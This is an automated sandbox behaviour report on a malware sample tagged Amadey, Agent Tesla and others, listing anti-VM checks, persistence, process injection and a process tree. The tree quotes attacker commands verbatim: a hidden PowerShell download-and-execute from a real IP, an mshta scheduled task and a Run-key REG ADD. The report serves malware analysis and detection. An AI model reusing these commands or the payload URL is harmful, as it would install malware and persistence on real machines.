amadey | 221ec52b5b50595fbaf95e8db9137a053f7f1b362e8c62550512393566a69085

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	5556	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5556	powershell.exe
3932	powershell.exe

Downloads MZ/PE file 10 IoCs

flow	pid	Process
62	3996	rapes.exe
62	3996	rapes.exe
16	5556	powershell.exe
254	3996	rapes.exe
540	3996	rapes.exe
669	3996	rapes.exe
600	3340	svchost.exe
775	3996	rapes.exe
35	3996	rapes.exe
438	3996	rapes.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\3tl2m_4796\ImagePath = "\\??\\C:\\Windows\\Temp\\4zG829_4796.sys"	tzutil.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kZZeUXM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kZZeUXM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kZZeUXM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kZZeUXM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	dBSGwVB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	dBSGwVB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	TbV75ZR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
3864	w32tm.exe

Executes dropped EXE 23 IoCs

pid	Process
4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
3996	rapes.exe
3868	dBSGwVB.exe
708	bild.exe
4940	kDveTWY.exe
5752	rapes.exe
3884	oalJJxv.exe
4976	kZZeUXM.exe
860	kZZeUXM.exe
3324	kDveTWY.exe
2604	fc9e8f62a2.exe
5436	dBSGwVB.exe
5080	bild.exe
3236	bild.exe
4752	WLbfHbp.exe
3904	rapes.exe
1476	f73ae_003.exe
4464	Exam.com
4796	tzutil.exe
3864	w32tm.exe
5932	TbV75ZR.exe
2168	7IIl2eE.exe
12776	Passwords.com

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe

Loads dropped DLL 14 IoCs

pid	Process
708	bild.exe
708	bild.exe
708	bild.exe
708	bild.exe
708	bild.exe
708	bild.exe
5080	bild.exe
5080	bild.exe
5080	bild.exe
5080	bild.exe
3236	bild.exe
3236	bild.exe
3236	bild.exe
3236	bild.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 593 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10343420101\\kZZeUXM.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 513 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10343460101\\kZZeUXM.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3732	tasklist.exe
6120	tasklist.exe
11524	tasklist.exe
11944	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
3996	rapes.exe
5752	rapes.exe
3904	rapes.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4940 set thread context of 4144	4940	kDveTWY.exe	121
PID 3324 set thread context of 4008	3324	kDveTWY.exe	145
PID 2604 set thread context of 4940	2604	fc9e8f62a2.exe	148

Drops file in Windows directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SinghCooling	TbV75ZR.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\ThinksMartin	TbV75ZR.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\MandateFlashing	TbV75ZR.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dBSGwVB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f73ae_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	oalJJxv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WLbfHbp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dBSGwVB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

pid	Process
3580	reg.exe
968	reg.exe
5848	reg.exe
8	reg.exe
3904	reg.exe
1180	reg.exe
2848	reg.exe
6000	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4564	schtasks.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
5556	powershell.exe
5556	powershell.exe
4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
3996	rapes.exe
3996	rapes.exe
4144	MSBuild.exe
4144	MSBuild.exe
4144	MSBuild.exe
4144	MSBuild.exe
5752	rapes.exe
5752	rapes.exe
4008	MSBuild.exe
4008	MSBuild.exe
4008	MSBuild.exe
4008	MSBuild.exe
4940	MSBuild.exe
4940	MSBuild.exe
4940	MSBuild.exe
4940	MSBuild.exe
3904	rapes.exe
3904	rapes.exe
3932	powershell.exe
3932	powershell.exe
3932	powershell.exe
4464	Exam.com
4464	Exam.com
4464	Exam.com
4464	Exam.com
4464	Exam.com
4464	Exam.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com
13068	powershell.exe
13068	powershell.exe
13068	powershell.exe
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
4796	tzutil.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1476	f73ae_003.exe
1476	f73ae_003.exe
1476	f73ae_003.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	5556	powershell.exe
Token: SeSecurityPrivilege	708	bild.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	3732	tasklist.exe
Token: SeDebugPrivilege	6120	tasklist.exe
Token: SeDebugPrivilege	11524	tasklist.exe
Token: SeDebugPrivilege	11944	tasklist.exe
Token: SeLoadDriverPrivilege	4796	tzutil.exe
Token: SeDebugPrivilege	13068	powershell.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
708	bild.exe
4464	Exam.com
4464	Exam.com
4464	Exam.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4464	Exam.com
4464	Exam.com
4464	Exam.com
12776	Passwords.com
12776	Passwords.com
12776	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 4364	3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3016 wrote to memory of 4364	3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3016 wrote to memory of 4364	3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3016 wrote to memory of 1296	3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3016 wrote to memory of 1296	3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3016 wrote to memory of 1296	3016	2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 4364 wrote to memory of 4564	4364	cmd.exe	90
PID 4364 wrote to memory of 4564	4364	cmd.exe	90
PID 4364 wrote to memory of 4564	4364	cmd.exe	90
PID 1296 wrote to memory of 5556	1296	mshta.exe	92
PID 1296 wrote to memory of 5556	1296	mshta.exe	92
PID 1296 wrote to memory of 5556	1296	mshta.exe	92
PID 5556 wrote to memory of 4372	5556	powershell.exe	100
PID 5556 wrote to memory of 4372	5556	powershell.exe	100
PID 5556 wrote to memory of 4372	5556	powershell.exe	100
PID 4372 wrote to memory of 3996	4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE	104
PID 4372 wrote to memory of 3996	4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE	104
PID 4372 wrote to memory of 3996	4372	Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE	104
PID 3996 wrote to memory of 3868	3996	rapes.exe	108
PID 3996 wrote to memory of 3868	3996	rapes.exe	108
PID 3996 wrote to memory of 3868	3996	rapes.exe	108
PID 3868 wrote to memory of 2216	3868	dBSGwVB.exe	109
PID 3868 wrote to memory of 2216	3868	dBSGwVB.exe	109
PID 3868 wrote to memory of 2216	3868	dBSGwVB.exe	109
PID 2216 wrote to memory of 2428	2216	cmd.exe	112
PID 2216 wrote to memory of 2428	2216	cmd.exe	112
PID 2216 wrote to memory of 2428	2216	cmd.exe	112
PID 2216 wrote to memory of 708	2216	cmd.exe	113
PID 2216 wrote to memory of 708	2216	cmd.exe	113
PID 2216 wrote to memory of 708	2216	cmd.exe	113
PID 3996 wrote to memory of 4940	3996	rapes.exe	118
PID 3996 wrote to memory of 4940	3996	rapes.exe	118
PID 4940 wrote to memory of 4596	4940	kDveTWY.exe	120
PID 4940 wrote to memory of 4596	4940	kDveTWY.exe	120
PID 4940 wrote to memory of 4596	4940	kDveTWY.exe	120
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 4940 wrote to memory of 4144	4940	kDveTWY.exe	121
PID 3996 wrote to memory of 3884	3996	rapes.exe	123
PID 3996 wrote to memory of 3884	3996	rapes.exe	123
PID 3996 wrote to memory of 3884	3996	rapes.exe	123
PID 3996 wrote to memory of 4976	3996	rapes.exe	125
PID 3996 wrote to memory of 4976	3996	rapes.exe	125
PID 4976 wrote to memory of 968	4976	kZZeUXM.exe	126
PID 4976 wrote to memory of 968	4976	kZZeUXM.exe	126
PID 4976 wrote to memory of 5848	4976	kZZeUXM.exe	128
PID 4976 wrote to memory of 5848	4976	kZZeUXM.exe	128
PID 4976 wrote to memory of 8	4976	kZZeUXM.exe	130
PID 4976 wrote to memory of 8	4976	kZZeUXM.exe	130
PID 4976 wrote to memory of 3904	4976	kZZeUXM.exe	132
PID 4976 wrote to memory of 3904	4976	kZZeUXM.exe	132
PID 3996 wrote to memory of 860	3996	rapes.exe	134
PID 3996 wrote to memory of 860	3996	rapes.exe	134
PID 860 wrote to memory of 1180	860	kZZeUXM.exe	135
PID 860 wrote to memory of 1180	860	kZZeUXM.exe	135
PID 860 wrote to memory of 2848	860	kZZeUXM.exe	137
PID 860 wrote to memory of 2848	860	kZZeUXM.exe	137
PID 860 wrote to memory of 6000	860	kZZeUXM.exe	139

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn a5grgmaNrgK /tr "mshta C:\Users\Admin\AppData\Local\Temp\yS7PLR3rj.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn a5grgmaNrgK /tr "mshta C:\Users\Admin\AppData\Local\Temp\yS7PLR3rj.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4564
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\yS7PLR3rj.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5556
  - - C:\Users\Admin\AppData\Local\Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE
      "C:\Users\Admin\AppData\Local\Temp3TBGS8EINKVEXADNXY6IYVEZPOLIHXKI.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4372
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3996
      - C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2216
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
        8⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2428
        
        C:\Users\Public\Netstat\bild.exe
        
        C:\Users\Public\Netstat\bild.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:708
      - C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4940
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4596
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
